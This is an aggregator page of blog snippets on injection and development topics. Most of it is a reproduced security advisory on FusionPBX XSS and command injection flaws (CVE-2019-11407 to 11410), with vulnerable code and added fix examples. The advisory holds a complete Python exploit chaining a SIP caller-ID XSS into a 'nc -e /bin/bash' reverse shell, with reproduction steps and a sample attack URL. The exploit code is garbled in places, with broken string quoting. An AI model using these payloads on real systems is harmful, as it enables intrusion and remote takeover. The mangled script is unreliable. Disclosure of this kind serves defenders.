Json Injection

17 Jun 19
IT Tech Book

An application programming interface (API) allows developers to establish a connection with services. These services can be cloud services and assist with updating a DB, storing data, pushing data in a queue, moving data, and managing other tasks. APIs play an important role in cloud computing. Different cloud providers depend on various API types. Consumers […]

17 Jun 19
The Sun
LOVE Island looks set to be thrown into turmoil yet again as the villa gets an injection of fresh blood with TWO hunky new arrivals. Jordan Hames, 24, and Tom Walker, 29, are sure to turn the girls’ heads and leave the boys quaking in their flip flops. After tonight’s dramatic recoupling, the new boys will hopefully be a breath of fresh air to the extremely tense villa but could they cause even more trouble? Jordan, a model from Manchester, says that although he wants to get along with the lads if he sees a girl he wants, he’s going to go for it. The hunk revealed: “For me it takes a lot for me to commit to a girl so when I am single I will dabble here and then. “But when I’m committed I am 100% loyal. But only if I meet the right girl.” The hunk added he has his eye on a few of the girls in the villa already. He said: “I like all of them, I’m greedy in that sense. “I like blondes, brunettes, red heads. I would say Anna, Amber, Molly-Mae and Elma are on my radar.” Jordan – who describes himself as a “smooth operator” – said he’s looking for someone with “nice eyes, good energy and good banter”, but warned he is put off by girls with “a really loud, annoying laugh”.
Meanwhile Tom, a model from Leeds, says he has his eye on Maura, Elma and Lucie. When asked who he fancied, he admitted: “I like the new girls – Maura is a cannon. She’s gone in there and torn it up. She might be a bit too hot to handle! “I really like Elma. She’s got a look I tend to go for. From day one I liked the look of Lucie, although she seems pretty happy and settled with Joe. I’ll find out whether she is when I get in.” Asked if he will be loyal in the villa, he replied: “I’m a loyal person. Never say never to the wandering eye because it’s the way of the show. “You feel like you’re really into one person but then who knows? I will make calculated decisions and I’m not going to go rushing in. “But I’m loyal so I don’t think I’ll be messing people around too much.”

16 Jun 19
Keith's Blog

As I noted in my Fabric Crashylitics blog entry, Crashylitics is going away somewhere between late summer and the end of 2019. I was able to do this by the use of Xamarin Forms Dependency Injection, in each project type: iOS and Android. First, of course, is to create the interface. This is what I […]

16 Jun 19
iValera

If you are looking for more information on specific topics, area of interest on Microsoft Technology, you share it with me in “Comment“; I will be happy to share my thought on those. Download complete code here Step-by-step, we are approaching real-time example of Microsoft Azure CosmosDB. Previous blog we show how to use Azure […]

11 Jun 19
INTIGRITI

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed. Hey hackers! These are our favorite resources shared by pentesters […]

10 Jun 19
MyBB Blog

MyBB 1.8.21 is now available, and is a security & maintenance release. This version includes updated jQuery and SCeditor, JSON Syndication format, improved PostgreSQL support, improved PHP >= 7.1 compatibility, improved search function reliability. See information on SCEditor-related theme updates. 6 security vulnerabilities addressed: High risk: Theme import stylesheet name RCE — reported by Simon […]

10 Jun 19
stevesanyal's Blog

DRAFT WORK IN PROGRESS Below are notes I’ve created from my Spring Boot learning using a variety of online courses.  Assumes you have knowledge of Java.  I wrote this in part because I find it useful to have a one stop place to lay out my understanding of how to write Spring Boot REST APIs.  […]

09 Jun 19
Xiaoqi Gao

I created this note for my own study purpose. Please see the following sharable link. https://www.evernote.com/l/AkDzmY5dFuBDZqVcArzk4LVZVMCzbdpYHX0 Week 1 Communication and Protocols ProtocolDefinition A set of a rules of how data are transmitted over the internet (between computers ) Network 4-layer model  Each layer provide protocol (rules) for certain type of data exchange and transfer Application […]

09 Jun 19
ROLANDO - MY SHARING BLOG

Python Contents: Python Introduction; What is Python?; What can Python do?; Why Python?; Good to know; Python Syntax compared to other programming languages; Python Getting Started; Python Install; Python Quickstart; The Python Command Line; Python Syntax; Execute Python Syntax; Python Indentations. […]

07 Jun 19
Security Boulevard

Aon’s Cyber Solutions has recently discovered several vulnerabilities in FusionPBX, an open-source VoIP PBX application that runs on top of the FreeSWITCH VoIP switch.  These vulnerabilities allow for novel exploitation vectors, including an exploit chain that is triggered by a phone call with a malicious caller ID value that leads to remote code execution.  This post provides an overview of a selection of the discovered vulnerabilities, and details of the caller ID RCE exploit chain that combines CVE-2019-11408 and CVE-2019-11409.  Future posts will cover additional FusionPBX vulnerabilities and their exploitation, including one triggered by sending a malicious fax.  All vulnerabilities described in this post have been patched.

Timeline:

04/04/19 – Vulnerabilities disclosed to FusionPBX
04/05/19 – Developer pushes preliminary patches to the project’s Github
04/07/19 – Attempt to contact developer to discuss coordinated disclosure
04/09/19 – Developer responds and states that they do not intend to publish advisory or otherwise disclose the existence of the vulnerabilities
04/22/19 – CVE IDs obtained and shared with developer, 2nd request for coordination of public disclosure, no response received
05/22/19 – Aon provides updated patch for CVE-2019-11409 in a pull request
06/02/19 – Pull request accepted
06/06/19 – Aon public disclosure

Vulnerability Listing / Credits:

CVE-2019-11408: Dustin Cobb – XSS in Operator Panel
CVE-2019-11409: Dustin Cobb – Command Injection in Operator Panel
CVE-2019-11410: Dustin Cobb – Command Injection in Backup Module
CVE-2019-11407: Dustin Cobb – Information disclosure through debug parameter

Details:

CVE-2019-11408 – XSS in Operator Panel

The operator panel module in FusionPBX suffers from a serious XSS vulnerability in the index_inc.php file.  The caller id number string isn’t properly output encoded before being rendered.  The output of this file is used by the index.php file, which refreshes every 1500ms by making an ajax call to the index_inc.php file.  The screen is designed to be used by a call center operator who wishes to monitor call activity on all of the extensions in the system.  Because this screen is designed to be constantly monitored by the operator, this becomes a more serious issue than an XSS vulnerability on an infrequently visited page.  An attacker may inject an XSS payload into the caller id number field of an inbound call, which can originate from the PSTN.  This vulnerability can be chained with CVE-2019-11409, resulting in remote code execution by an unauthenticated attacker.  This is demonstrated by the exploit code provided below.

In summary, an attacker may initiate a call from outside of the network with a specially crafted caller id number and, should the operator have this screen up at that time, gain remote code execution resulting in full system compromise.

The vulnerable code is shown below.  On line 47 in the index_inc.php file, get_call_activity() is called:

46 //get the call activity
47         $activity = get_call_activity();

On lines 40 and 41 of the get_call_activity() function, we can see that the call activity values are being retrieved from FreeSWITCH via an event socket API call. On line 114, the caller id number value is being extracted from that JSON response.  Note that at no point has the code performed any sanitization or HTML encoding.
app/operator_panel/resources/functions/get_call_activity.php:

37         //send the command
38                 $fp = event_socket_create($_SESSION['event_socket_ip_address'], $_SESSION['event_socket_port'], $_SESSION['event_socket_password']);
39                 if ($fp) {
40                         $switch_cmd = 'show channels as json';
41                         $switch_result = event_socket_request($fp, 'api '.$switch_cmd);
42                         $json_array = json_decode($switch_result, true);
43                 }
[…]
112                                         $array[$x]["state"] = $field['state'];
113                                         $array[$x]["cid_name"] = $field['cid_name'];
114                                         $array[$x]["cid_num"] = $field['cid_num'];

Once the get_call_activity() function returns with the unsanitized caller id number value, that value is assigned to $call_number, which is then directly concatenated into the HTML on line 369:
app/operator_panel/index_inc.php:

215                 $dir_icon = 'inbound';
216                 $call_name = $activity[$ext['cid_num']]['effective_caller_id_name'];
217                 $call_number = format_phone($ext['cid_num']);
[…]
368                 $block .= "                     </td></tr></table>";
369                 $block .= "                     <span id='op_caller_details_".$extension."'><strong>".$call_name."</strong><br>".$call_number."</span>";
370                 $block .= "             </span>";
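
The two controls missing from the listings above, shown as an added example rather than FusionPBX's own code or its patch: caller ID values are checked when they are read from the event socket reply, and every dynamic value is HTML-encoded at the point where it is concatenated into markup. The helper names, the caller ID character policy and the sample JSON are assumptions constructed for illustration.

```php
<?php
// Added example, not FusionPBX code. Helper names are hypothetical.

// Constructed sample shaped like a decoded `show channels as json` reply.
// Only the fields quoted in the advisory are modelled; the second row carries
// markup in both caller ID fields, as a call from the PSTN could.
$switch_result = '{"row_count":2,"rows":['
    . '{"state":"CS_EXECUTE","cid_name":"Alice","cid_num":"+12125551212"},'
    . '{"state":"CS_EXECUTE","cid_name":"<i>Mallory</i>","cid_num":"1212<b>555</b>"}'
    . ']}';

/** Encode an untrusted value for an HTML text or quoted-attribute context. */
function h($value): string
{
    // ENT_QUOTES matters here: the panel markup uses single-quoted attributes
    return htmlspecialchars(
        is_scalar($value) ? (string) $value : '',
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
}

/**
 * Input-side check (assumed policy): a dialable caller ID is 1 to 32
 * characters from digits, '+', '*' and '#'. Anything else is replaced by a
 * marker so the operator still sees that a call is present.
 * This is defence in depth; the output encoding below is the actual fix.
 */
function normalize_cid_num($raw): string
{
    if (is_string($raw) && preg_match('/\A[0-9+*#]{1,32}\z/', $raw) === 1) {
        return $raw;
    }
    return 'invalid caller id';
}

/** Build the caller details span with every dynamic value encoded. */
function render_caller_details(string $extension, array $row): string
{
    $call_name = $row['cid_name'] ?? '';
    $call_number = normalize_cid_num($row['cid_num'] ?? null);

    return "<span id='op_caller_details_" . h($extension) . "'><strong>"
        . h($call_name) . "</strong><br>" . h($call_number) . "</span>";
}

$json_array = json_decode($switch_result, true);
if (!is_array($json_array) || !isset($json_array['rows']) || !is_array($json_array['rows'])) {
    exit("unexpected event socket response\n");
}

foreach ($json_array['rows'] as $i => $row) {
    // Extension numbers 1001, 1002 are constructed for the demo
    echo render_caller_details((string) (1001 + $i), $row), "\n";
}
```

For the second row the caller name is emitted as `&lt;i&gt;Mallory&lt;/i&gt;` and the number as the `invalid caller id` marker, so neither field reaches the operator's browser as markup.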

CVE-2019-11409 – Command Injection in Operator Panel

The exec.php component of the operator panel module suffers from an API command injection vulnerability.  This code is meant to send certain commands to the FreeSWITCH event socket interface, like disconnect calls or initiate call recording.  However, the command actually being sent to the event socket interface is entirely controlled by the “cmd” parameter.  Although authentication is required for exploitation, administrative privileges are not.  No CSRF protection is in place, making it possible to target authenticated users with HTML payloads that can silently exploit the issue.  It can also be chained with the XSS in CVE-2019-11408 to achieve unauthenticated remote code execution.  To exploit this issue, an authenticated user with access to the operator panel interface simply needs to make a request such as this:

https://victim-pbx1.example.com/app/operator_panel/exec.php?cmd=system%20nc%20-e%20/bin/bash%10.10.10.10%204444

The vulnerable code is shown below. On line 51, we can see that the $switch_cmd variable is being initialized with the value from a GET parameter.  While an attempt is being made to sanitize the value for normal command injection characters, none are needed in this case.  We simply issue a command directly.
/app/operator_panel/exec.php

50         if (count($_GET)>0) {
51                 $switch_cmd = trim(check_str($_GET["cmd"]));
52                 $action = trim(check_str($_GET["action"])); 

On line 162, we see that the command is being sent directly to the event socket interface:

162                 $switch_result = event_socket_request($fp, 'api '.$switch_cmd);

When sending the FreeSWITCH “system” command, any shell command can be executed within the context of the FreeSWITCH user.
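
One way to close this class of bug, as an added example and not the project's actual patch: the client sends only an action name and a call UUID, and the server builds the event socket command from a fixed table after checking an anti-CSRF token. The function name, parameter names, token handling and recording path are assumptions; `uuid_kill` and `uuid_record` are standard FreeSWITCH API commands.

```php
<?php
// Added example, not FusionPBX code. Names are hypothetical.

const UUID_RE = '/\A[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\z/i';

/**
 * Map a client-supplied action to a fixed FreeSWITCH API command.
 * The client never supplies command text, only an action name and a call
 * UUID. Returns null when the request must be rejected.
 * In a real handler $params would come from a POST body, not the query string.
 */
function build_switch_cmd(array $params, string $session_token): ?string
{
    // Anti-CSRF: per-session token, compared in constant time
    $token = $params['token'] ?? '';
    if (!is_string($token) || $session_token === '' || !hash_equals($session_token, $token)) {
        return null;
    }

    $action = $params['action'] ?? '';
    $uuid = $params['uuid'] ?? '';
    if (!is_string($action) || !is_string($uuid) || preg_match(UUID_RE, $uuid) !== 1) {
        return null;
    }

    switch ($action) {
        case 'hangup':
            return 'uuid_kill ' . $uuid;
        case 'record':
            // Recording path is built server-side from the validated UUID
            // (directory is an assumed location)
            return 'uuid_record ' . $uuid . ' start /var/lib/freeswitch/recordings/' . $uuid . '.wav';
        default:
            return null; // unknown action: nothing is sent to the event socket
    }
}

// Constructed requests for the demo
$session_token = bin2hex(random_bytes(16));
$call_uuid = '3f2b1c9e-8a4d-4e5f-9b6a-0c1d2e3f4a5b';

$requests = [
    'valid hangup'      => ['action' => 'hangup', 'uuid' => $call_uuid, 'token' => $session_token],
    'valid record'      => ['action' => 'record', 'uuid' => $call_uuid, 'token' => $session_token],
    'raw cmd parameter' => ['cmd' => 'status', 'token' => $session_token],
    'missing token'     => ['action' => 'hangup', 'uuid' => $call_uuid],
    'malformed uuid'    => ['action' => 'hangup', 'uuid' => $call_uuid . ' extra', 'token' => $session_token],
];

foreach ($requests as $label => $params) {
    $cmd = build_switch_cmd($params, $session_token);
    // Only a non-null result would be passed on as 'api ' . $cmd
    echo str_pad($label, 20), $cmd === null ? 'REJECTED' : 'api ' . $cmd, "\n";
}
```

Only the first two requests produce a command; a request that carries free-form command text, lacks the token, or supplies anything other than a well-formed UUID is rejected before the event socket is contacted.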

Exploit Code (chains -11408 and -11409):

#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5

# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the “Caller ID Number” field, or “User” component of the SIP “From” URI.
# 2. Connect to external SIP profile port and send a SIP INVITE packet with XSS payload injected into the From Field.
# 3. XSS payload will fire operator panel screen, which is designed to be monitored constantly by a call center operator.
# 4. Once XSS code executes, a call is made to the exec.php script with a reverse shell payload that connects back to a netcat listener on the attacker system.  Refer to vulnerability #2 in this document for details.


# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"

attacker_ip="10.10.10.20"
attacker_port=4444

def encode(val):
    ret=""

    for c in val:
        ret+="\\x%02x" % ord(c)

    return ret

callid=md5(str(randint(0,99999999))).hexdigest()

cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd

xss=";tag=%s
To: 
Call-ID: %s
CSeq: 1 INVITE
Contact: 
Max-Forwards: 70
User-Agent: Exploit POC
Content-Type: application/sdp
Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
Content-Length: 209

v=0
o=root 1204310316 1204310316 IN IP4 127.0.0.1
s=Media Gateway
c=IN IP4 127.0.0.1
t=0 0
m=audio 4446 RTP/AVP 0 101
a=rtpmap:0 PCMU/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=ptime:2
a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)

payload=payload.replace("\n","\r\n")

s=socket.socket()

s.connect((victim_addr,5080))

print payload
print

s.send(payload)
data=s.recv(8192)

print data

Reproduction Steps:

1.    View the vulnerable operator screen in a web browser, located in this example at https://10.10.10.10/app/operator_panel/index.php
2.    Start a netcat listener on a remote system, 10.10.10.20 in this example
3.    Run the exploit code above on the remote system in another terminal window
4.    The exploit will connect to the netcat listener and provide a reverse shell

CVE-2019-11410 – Command Injection in Backup Module

The restore function in the backup module of FusionPBX suffers from a command injection vulnerability. An authenticated user with admin privileges may upload a file with a specially crafted filename which will result in remote code execution via shell command injection.

CVE-2019-11407 – Information disclosure through debug parameter

The operator panel module suffers from an information disclosure vulnerability that reveals sensitive information, such as the password for the FreeSWITCH event socket interface. This is due to a debug parameter which dumps the contents of several arrays, most notably the $_SESSION array.

07 Jun 19
Antonio's Blog

In this blog post I’ll show you how to configure a Quarkus application using the specific application.properties file as well as the Microprofile Config API. To break it into more details you will learn: How to configure a Quarkus application and have separate values for development and test How to use Microprofile Config to inject […]

07 Jun 19
IT Outsourcing China

MEAN Stack Architecture Explanation 1.   When any client makes any request, it is firstly processed by the AngularJS. AngularJS is a client-side language in JavaScript. 2.   After that, the Request enters in phase 2 which is NodeJS. NodeJS is a server-side language in JavaScript. 3.   After that Request enters in phase 3 which is ExpressJS […]

06 Jun 19
InfoSec Industry

Posted by Lukasz Siewierski, Android Security & Privacy Team We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device that displays ads. The creators of Triada collected revenue from the ads displayed by […]